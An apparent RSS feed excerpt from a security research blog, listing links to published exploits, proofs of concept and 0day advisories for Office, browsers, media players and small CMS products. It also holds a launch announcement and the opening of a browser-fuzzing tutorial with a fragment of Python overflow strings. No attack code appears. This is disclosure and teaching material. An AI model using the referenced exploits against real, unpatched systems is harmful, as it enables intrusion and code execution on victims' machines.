<p><strong>Day12:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14982">MOAUB #12 &#8211; Adobe Acrobat and Reader &#8220;pushstring&#8221; Memory Corruption</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14983">MOAUB #12 &#8211; Adobe Acrobat and Reader “pushstring” Memory Corruption</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14980">MOAUB #12 &#8211; eshtery CMS SQL Injection Vulnerability</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14981">MOAUB #12 &#8211; eshtery CMS SQL Injection Vulnerability</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day13:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14992">MOAUB #13 &#8211; RealPlayer FLV Parsing Integer Overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14994">MOAUB #13 &#8211; RealPlayer FLV Parsing Integer Overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14991">MOAUB #13 &#8211; Luftguitar CMS Vulnerability: Upload Arbitrary File</a></span><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14993">MOAUB #13 &#8211; Luftguitar CMS Vulnerability: Upload Arbitrary File</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day14:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/download_pdf/15002">MOAUB #14 &#8211; Novell iPrint Client Browser Plugin ExecuteRequest debug Parameter Stack Overflow</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15001">MOAUB #14 &#8211; Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14999">MOAUB #14 &#8211; FreeDiscussionForums v1.0 Multiple Remote Vulnerabilities</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15000">MOAUB #14 &#8211; FreeDiscussionForums v1.0 Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day15:</strong></p>
<p>Binary Analysis:</p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15008">MOAUB #15 &#8211; Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption</a></span><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15009">MOAUB #15 &#8211; Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15011">MOAUB #15 &#8211; PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15012">MOAUB #15 &#8211; PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day16:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15019">MOAUB #16 &#8211; Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15021">MOAUB #16 &#8211; Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15020">MOAUB #16 &#8211; mojoportal Multiple Remote Vulnerabilities</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15018">MOAUB #16 &#8211; mojoportal Multiple Remote Vulnerabilities</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day17:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15027">MOAUB #17 &#8211; Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15028">MOAUB #17 &#8211; Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15030">MOAUB #17 &#8211; phpmyfamily Multiple Remote Vulnerabilities</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15029">MOAUB #17 &#8211; phpmyfamily Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day18:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15035">MOAUB #18 &#8211; Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15036">MOAUB #18 &#8211; Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15037">MOAUB #18 &#8211; CMSimple XSRF Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15038">MOAUB #18- CMSimple XSRF Vulnerability</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day19:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15042">MOAUB #19 &#8211; Novell iPrint Client Browser Plugin call-back-url Stack Overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15043">MOAUB #19 &#8211; Novell iPrint Client Browser Plugin call-back-url Stack Overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15044">MOAUB #19 &#8211; JMD-CMS Multiple Remote Vulnerabilities</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15045">MOAUB #19 &#8211; JMD-CMS Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day20:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15056">MOAUB #20 &#8211; Java CMM readMabCurveData Stack Overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15057">MOAUB #20 &#8211; Java CMM readMabCurveData Stack Overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15059">MOAUB #20 &#8211; VWD-CMS CSRF Vulnerability</a></span><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15058">MOAUB #20 &#8211; VWD-CMS CSRF Vulnerability</a></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong> </strong></p>
<p><strong>Day21:</strong></p>
<p>Binary Analysis:</p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15066">MOAUB #21 &#8211; Microsoft Excel WOPT Record Parsing Heap Memory Corruption</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15065">MOAUB #21 &#8211; Microsoft Excel WOPT Record Parsing Heap Memory Corruption</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15067">MOAUB #21 &#8211; Personal.Net Portal Multiple Vulnerabilities</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15068">MOAUB #21 &#8211; Personal.Net Portal Multiple Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day22:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15076">MOAUB #22 &#8211; Adobe Shockwave Director tSAC Chunk Memory Corruption</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15077">MOAUB #22 &#8211; Adobe Shockwave Director tSAC Chunk Memory Corruption</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15079">MOAUB #22 &#8211; gausCMS Multiple Vulnerabilities</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15078">MOAUB #22 &#8211; gausCMS Multiple Vulnerabilities</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day23:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15086">MOAUB #23 &#8211; Adobe Acrobat Reader and Flash &#8216;newfunction&#8217; Remote Code Execution Vulnerability</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15087">MOAUB #23 &#8211; Adobe Acrobat Reader and Flash &#8216;newfunction&#8217; Remote Code Execution Vulnerability</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15089">MOAUB #23 &#8211; Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15088">MOAUB #23 &#8211; Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day24:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15094">MOAUB #24 &#8211; Microsoft Excel OBJ Record Stack Overflow</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15095">MOAUB #24 &#8211; Microsoft Excel OBJ Record Stack Overflow</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15096">MOAUB #24 &#8211; Microsoft MPEG Layer-3 Audio Decoder Division By Zero</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15097">MOAUB #24 &#8211; Microsoft MPEG Layer-3 Audio Decoder Division By Zero</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day</strong><strong>25</strong><strong>:</strong></p>
<p>Binary Analysis:</p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15104">MOAUB #25 &#8211; Mozilla Firefox CSS font-face Remote Code Execution Vulnerability</a></span><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15105">MOAUB #25 &#8211; Mozilla Firefox CSS font-face Remote Code Execution Vulnerability</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15106">MOAUB #25 &#8211; VisualSite CMS v1.3 Multiple Vulnerabilities</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15107">MOAUB #25 &#8211; VisualSite CMS v1.3 Multiple Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day</strong><strong>26</strong><strong>:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15112">MOAUB #26 &#8211; Microsoft Cinepak Codec CVDecompress Heap Overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15113">MOAUB #26 &#8211; Microsoft Cinepak Codec CVDecompress Heap Overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15114">MOAUB #26 &#8211; Zenphoto Config Update and Command Execute Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15115">MOAUB #26 &#8211; Zenphoto Config Update and Command Execute Vulnerability</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day</strong><strong>27</strong><strong>:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15122">MOAUB #27 &#8211; Microsoft Internet Explorer MSHTML Findtext Processing Issue</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/15123">MOAUB #27 &#8211; Microsoft Internet Explorer MSHTML Findtext Processing Issue</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15125">MOAUB #27 &#8211; ndCMS Sql Injection Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/exploits/15124">MOAUB #27 &#8211; ndCMS Sql Injection Vulnerability</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day</strong><strong>28</strong><strong>:</strong></p>
<p>0day:</p>
<p><a href="http://www.exploit-db.com/download_pdf/15142">MOAUB #28 &#8211; JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15141">MOAUB #28 &#8211; JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15139">MOAUB #28 &#8211; AtomatiCMS Upload Arbitrary File Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15140">MOAUB #28 &#8211; AtomatiCMS Upload Arbitrary File Vulnerability</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day29:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/download_pdf/15149">MOAUB #29 &#8211; Microsoft Excel SxView Record Parsing Heap Memory Corruption</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/15148">MOAUB #29 &#8211; Microsoft Excel SxView Record Parsing Heap Memory Corruption</a></span><strong></strong></p>
<p><strong> </strong></p>
<p><strong>Day30:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/15158">MOAUB #30 &#8211; Microsoft Unicode Scripts Processor Remote Code Execution</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15159">MOAUB #30 &#8211; Microsoft Unicode Scripts Processor Remote Code Execution</a><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/15160">MOAUB #30 &#8211; ASPMass Shopping Cart Vulnerability File Upload CSRF</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/15161">MOAUB #30 &#8211; ASPMass Shopping Cart Vulnerability File Upload CSRF</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Press :</p>
<div id="_mcePaste"><a title="Exploit-Database" href="http://www.exploit-db.com/moaub-0days-binary-analysis-exploit-pocs/" target="_blank">Exploit-Database</a></div>
<div id="_mcePaste"><a title="Dark-Reading" href="http://www.darkreading.com/vulnerability_management/security/vulnerabilities/showArticle.jhtml?articleID=227300290" target="_blank">Dark-Reading</a></div>
<div id="_mcePaste"><a title="Network-Asia" href="http://security.networksasia.net/content/abysssec-outs-linux-vulnerability" target="_blank">NetworkAsia</a></div>
<div id="_mcePaste"><a title="ITBusinessedge" href="http://www.itbusinessedge.com/cm/blogs/poremba/get-out-the-bug-spray-september-is-the-month-of-bugs" target="_blank">ITBusinessedge</a></div>
<div id="_mcePaste"><a title="ComputerWorld" href="http://www.computerworld.com/s/article/9182999/Researchers_slate_month_of_bugs_launch_for_Wednesday" target="_blank">ComputerWorld</a></div>
<div id="_mcePaste"><a title="Theinquirer" href="http://www.theinquirer.net/inquirer/news/1730813/researchers-launch-bug-hunt?WT.rss_f=Home&amp;WT.rss_a=Researchers+launch+a+bug+hunt" target="_blank">Theinquirer</a></div>
<div>And &#8230;</div>
<div>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
</div>
<p>PS : during these project and maybe we made some technical and non-technical mistakes due to complexly and compaction of this work and we hope we can fix some of them.</p>
<p style="text-align: left;">at end we are happy with result and your kind feedback.</p>
<p style="text-align: left;">for sure we will have really more interesting projects soon as soon possible and we think you will like them as well .</p>
<p style="text-align: left;">please follow me on twitter with @abysssec for other news projects and stay tunned for more projects .</p>
<p style="text-align: left;">as always finally if you have any question feel free to contact :</p>
<p>shahin [at] abysssec.com</p>
<p style="text-align: left;">info [at] abysssec.com</p>
<p style="text-align: left;">
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2010/09/01/moaub-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Month of Abysssec Undisclosed bugs coming !</title>
		<link>http://www.abysssec.com/blog/2010/08/17/month-of-abysssec-undisclosed-bugs-coming/</link>
		<comments>http://www.abysssec.com/blog/2010/08/17/month-of-abysssec-undisclosed-bugs-coming/#comments</comments>
		<pubDate>Tue, 17 Aug 2010 19:26:18 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[news]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[binary analysis]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploit-db]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[MOAUB]]></category>
		<category><![CDATA[shahin]]></category>
		<category><![CDATA[shahin ramezany]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1204</guid>
		<description><![CDATA[hello to all after a while we have big surprise for you . We are about to unleash our Month Of Abysssec Undisclosed Bugs on exploit-db. Starting on the 1st of September, we will release a collection of 0days,  web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. [...]]]></description>
			<content:encoded><![CDATA[<p>hello to all after a while we have big surprise for you .</p>
<p><img class="aligncenter" title="MOUAB" src="http://www.exploit-db.com/images/MOAUB/MOAUB-0.png" alt="" width="600" height="220" /></p>
<p>We are about to unleash our <span style="color: #ff0000;">Month Of Abysssec Undisclosed Bugs </span>on exploit-db. Starting on the 1st of September, we will release a collection of 0days,  web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as <span style="color: #ff0000;">Microsoft</span>, <span style="color: #ff0000;">Mozilla</span>, <span style="color: #ff0000;">Sun</span>, <span style="color: #ff0000;">Apple</span>, <span style="color: #ff0000;">Adobe</span>,<span style="color: #ff0000;"> HP</span>, <span style="color: #ff0000;">Novel</span>, etc. The 0day collection includes PoCs and Exploits for <span style="color: #ff6600;">Microsoft Excel</span>, <span style="color: #ff6600;">Internet Explorer</span>,<span style="color: #ff6600;">Microsoft codecs</span>, <span style="color: #ff6600;">Cpanel </span>and others.  The MOAUB will be hosted on the <a href="http://exploit-db.com">Exploit Databas</a>e, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride!</p>
<p>this is link on exploit-db  :</p>
<p><a href="http://www.exploit-db.com/moaub-0days-binary-analysis-exploit-pocs/">http://www.exploit-db.com/moaub-0days-binary-analysis-exploit-pocs/</a></p>
<p>Follow <a title="Abysssec Security Team" rel="nofollow" href="http://twitter.com/Abysssec" target="_blank">Abysssec</a> twitter to keep updated!</p>
<p>stay tunned .</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2010/08/17/month-of-abysssec-undisclosed-bugs-coming/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>writing a Browser fuzzer !!!</title>
		<link>http://www.abysssec.com/blog/2009/08/21/how-to-write-browser-fuzzer/</link>
		<comments>http://www.abysssec.com/blog/2009/08/21/how-to-write-browser-fuzzer/#comments</comments>
		<pubDate>Fri, 21 Aug 2009 16:12:12 +0000</pubDate>
		<dc:creator>daphne</dc:creator>
				<category><![CDATA[Fuzzing / Auditing]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[browser fuzzing]]></category>
		<category><![CDATA[FireFox Exploit]]></category>
		<category><![CDATA[font]]></category>
		<category><![CDATA[fuzzer]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tag]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=368</guid>
		<description><![CDATA[Hello all in this post , i wanna talk about web browser Fuzzing  and auditing. web browsers , such as FireFox , Opera , Internet Explorer  and etc .. , are very convertible with new web technologies. For example : when html5 comes , Firefox added html5 features to itself too.  and a clever Attacker [...]]]></description>
			<content:encoded><![CDATA[<p>Hello all<br />
in this post , i wanna talk about web browser Fuzzing  and auditing.<br />
web browsers , such as FireFox , Opera , Internet Explorer  and etc .. , are very convertible with new web technologies.</p>
<p><strong>For example : </strong><br />
when html5 comes , Firefox added html5 features to itself too.  and a clever Attacker could recognizing  this change and we will be able to find Security holes .</p>
<p>for more information please read :</p>
<p>w3.org publish paper with this title: HTML 5 differences from HTML 4<br />
<a href="http://www.w3.org/TR/2009/WD-html5-diff-20090212/">http://www.w3.org/TR/2009/WD-html5-diff-20090212/</a><br />
and take HTML5 Overview :<br />
<a href="http://dev.w3.org/html5/spec/Overview.html">http://dev.w3.org/html5/spec/Overview.html</a></p>
<p>please  pay attention to differences between FF3 &amp; FF3.5 :</p>
<blockquote><p>These changes include support for the &lt;video&gt; and &lt;audio&gt; tags as defined in the HTML 5 specification, with a goal to offer video playback without being encumbered by patent issues associated with many video technologies.</p>
<p>Cross-site XMLHttpRequests (XHR), which can allow for more powerful web applications and an easier way to implement mashups, are also implemented in 3.5.</p>
<p>A new global JSON object contains native functions to efficiently and safely serialize and deserialize JSON objects, as specified by the ECMAScript 3.1 draft.</p>
<p>Full CSS 3 selector support has been added. Firefox 3.5 uses the Gecko 1.9.1 engine, which includes a few features that were not included in the 3.0 release. Multi-touch support was also added to the release, including gesture support like pinching for zooming and swiping for back and forward.</p></blockquote>
<p>and then milw0rm.com publish new exploit in &#8220;Firefox font tag !&#8221;<br />
<a href="http://www.milw0rm.com/exploits/9137">http://www.milw0rm.com/exploits/9137</a></p>
<p>we are not bloodsucker , we try to act like a  real hacker , Real hacker (Pen-tester i mean)  think about how to find  this type of bug .</p>
<p>since we know about all of  new  features in  new web browsers  such as of FF  and we can test features as a security researcher as well.</p>
<p>Browser Vulnerability Assessment  has tree  step :</p>
<p>1 &#8211; Find <strong>HTML </strong>or <strong>XML </strong>or <strong>javascript </strong>&lt;tag&gt; browser can support , for example :<br />
<a href="http://msdn.microsoft.com/en-us/library/ms533050%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/ms533050%28VS.85%29.aspx</a> [IE]</p>
<p>2- find  Properties , Methods , Collections , Events ,Constants , Prototypes , HTML Elements for each &lt;tag&gt; .</p>
<p>3- misuse property of &lt;tag&gt; or fuzzed tag for buffer-overflow and other memory corruption vulnerabilities (in this case)</p>
<p>for example :<br />
we want find memory corruption vulnerability using ,  unbound check in  &lt;font&gt; tag,  in  Internet explorer 8 !:<br />
<span style="text-decoration: underline;"><em> &lt;font color=&#8221;#727272&#8243;&gt;test&lt;/font&gt;</em></span></p>
<p>take a look at  &#8220;MSDN&#8221; :<br />
<a href="http://msdn.microsoft.com/en-us/library/ms535248%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/ms535248%28VS.85%29.aspx</a></p>
<p>second : find &#8220;Attribute&#8221; and &#8220;property&#8221; of &lt;font&gt; tag , such as :<br />
&#8216;color&#8217;, &#8216;face&#8217;, &#8216;size&#8217;, &#8216;class&#8217;, &#8216;id&#8217;, &#8216;style&#8217;, &#8216;title&#8217;, &#8216;dir&#8217;, &#8216;lang&#8217;, &#8216;accesskey&#8217;, &#8216;tabindex&#8217;</p>
<p>third  : build random character for &#8220;overflows &#8221; , &#8220;FormatString&#8221;  , and other memory corruptions &#8230;</p>
<p><span style="color: #ff6600;">for example to be more clear i wrote a really basic fuzzer in python :<br />
</span></p>
<p><span style="color: #ff6600;">(for sure this is not a commercial fuzzer)<br />
</span></p>

<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;"># Abysssec Inc public material</span>
<span style="color: #808080; font-style: italic;"># Simple Browser Fuzzer</span>
<span style="color: #808080; font-style: italic;"># www.Abysssec.com</span>
<span style="color: #808080; font-style: italic;">#garbage char</span>
overflows = <span style="color: black;">&#91;</span><span style="color: #483d8b;">'A'</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">10</span>, <span style="color: #483d8b;">'A'</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">20</span>, <span style="color: #483d8b;">'A'</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">100</span>, <span style="color: #483d8b;">'A'</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">200</span><span style="color: black;">&#93;</span>
